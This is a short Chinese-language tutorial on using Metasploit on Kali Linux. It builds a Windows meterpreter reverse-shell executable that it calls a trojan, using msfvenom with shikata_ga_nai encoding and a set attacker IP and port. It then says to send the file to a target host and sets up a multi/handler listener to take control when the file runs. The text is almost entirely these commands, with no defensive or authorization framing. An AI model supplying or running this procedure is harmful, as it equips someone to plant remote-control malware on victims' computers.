简介

Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。

生成

首先我们打开kali,打开一个终端

输入下面的命令并按下回车进行生成:

msfvenom -p windows/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=5555 -f exe > ./test.exe

LHOST=192.168.1.106 此步是设置攻击者IP地址

LPORT=5555 此步是设置木马将会主动连接攻击者设定的监听端口

test.exe 木马名称

生成完成后打开你存放的目录,我这里是root的根目录

然后将这个文件发送到目标主机(先别急着运行)

设置监听

现在我们回到kali中,在终端中启动msf(启动命令:msfconsole)

启动完成后下面开始设置监听

依次输入下面命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.106
set LPORT 5555
exploit

set LHOST 192.168.1.106 后面的ip地址是kali的ip

获取kal ip的方法:在终端输入ifconfig

set LPORT 5555 监听端口

下面就是监听状态

一切准备就绪现在可以去运行目标主机的那个msf文件

好了此教程就到这里了